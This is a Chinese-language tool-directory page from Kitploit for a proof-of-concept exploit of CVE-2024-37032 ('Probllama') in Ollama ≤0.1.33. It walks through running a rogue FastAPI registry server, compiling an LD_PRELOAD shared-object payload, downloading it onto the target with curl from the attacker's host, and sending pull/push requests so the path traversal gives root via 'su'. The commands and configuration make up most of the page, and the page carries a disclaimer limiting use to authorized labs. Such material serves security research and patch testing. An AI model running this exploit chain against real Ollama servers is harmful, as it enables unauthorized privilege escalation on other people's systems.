Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/itzsh4dowxz/cve-2024-37032-poc
权限提升漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubitzsh4dowxz/cve-2024-37032-poc

CVE-2024-37032-PoC

CVE-2024-37032 (Probllama) 针对 Ollama ≤0.1.33 的 PoC:通过模型摘要处理实现路径遍历和任意文件写入,导致自动权限提升。

查看仓库
832个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-37032 Probllama PoC — Ollama 路径遍历与权限提升

该仓库包含一个概念验证的 FastAPI 注册服务器、连接器脚本以及用于授权实验室测试的预加载演示库。

仅在你拥有或明确允许测试的系统上使用。

文件

  • server.py: 启动 FastAPI PoC 服务器。
  • rogue_server/config.py: PoC 服务器的中央配置。
  • connector.py: 向目标 Ollama API 发送拉取/推送请求。
  • preload_privs_demo.c: 共享对象负载的 C 源代码。
  • requirements.txt: PoC 服务器的 Python 依赖。

1. 安装服务器依赖

在你的主机上安装 Python 依赖:

root@kitploit:~
python -m pip install -r requirements.txt

2. 配置主机和端口

在你的主机上编辑 rogue_server/config.py:

root@kitploit:~
HOST = "<your_host_ip_or_host_ip>"

编辑 connector.py:

root@kitploit:~
SERVER_HOST = "<your_host_ip_or_host_ip:8000>"
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 11434

注意:

  • SERVER_HOST 必须指向运行 server.py 的主机。
  • 如果 PoC 服务器运行在端口 8000,则需同时在 HOST 和 SERVER_HOST 中包含端口号,例如 10.10.16.160:8000。
  • TARGET_HOST 和 TARGET_PORT 必须指向目标 Ollama API。如果 connector.py 直接在目标机器上运行,通常 127.0.0.1:11434 是正确的。
  • 如果更改了 rogue_server/config.py,请重启 PoC 服务器。

3. 构建共享对象

编译 C 文件并将输出命名为 libpreload_privs_demo.so:

root@kitploit:~
gcc -shared -fPIC -o libpreload_privs_demo.so preload_privs_demo.c

4. 将文件传输到目标

将这些文件复制到授权的目标机器上:

  • libpreload_privs_demo.so
  • connector.py

一种简单的方法是从你的主机提供文件服务:

root@kitploit:~
python3 -m http.server 8081

然后在目标机器上下载它们:

root@kitploit:~
curl -O http://<your_host_ip>:8081/libpreload_privs_demo.so
curl -O http://<your_host_ip>:8081/connector.py

下载共享对象后,记下其在目标机器上的绝对路径,并在主机上的 rogue_server/config.py 中将其设置为 exploit_path。

示例:

root@kitploit:~
exploit_path = "/tmp/libpreload_privs_demo.so"

5. 启动 PoC 服务器

在你的主机上启动 FastAPI 服务器:

root@kitploit:~
python server.py

默认情况下,该项目在 0.0.0.0:8000 上启动 Uvicorn。

6. 运行连接器

在授权的目标机器上运行:

root@kitploit:~
python3 connector.py

连接器向配置的 Ollama API 发送拉取和推送请求。

7. 验证结果

连接器完成后,运行:

root@kitploit:~
su

在一个配置正确的存在漏洞的实验室目标上,预加载路径应被使用,并且可以观察到权限提升。

故障排除

  • 确认主机防火墙允许 PoC 服务器端口和临时文件服务器端口。
  • 确认 connector.py 中的 SERVER_HOST 与 rogue_server/config.py 中的 HOST 匹配。
  • 确认 exploit_path 是 libpreload_privs_demo.so 在目标机器上的确切绝对路径。
  • 确认目标 Ollama API 在 TARGET_HOST:TARGET_PORT 可达。
  • 更改 rogue_server/config.py 后重启 server.py。
下载工具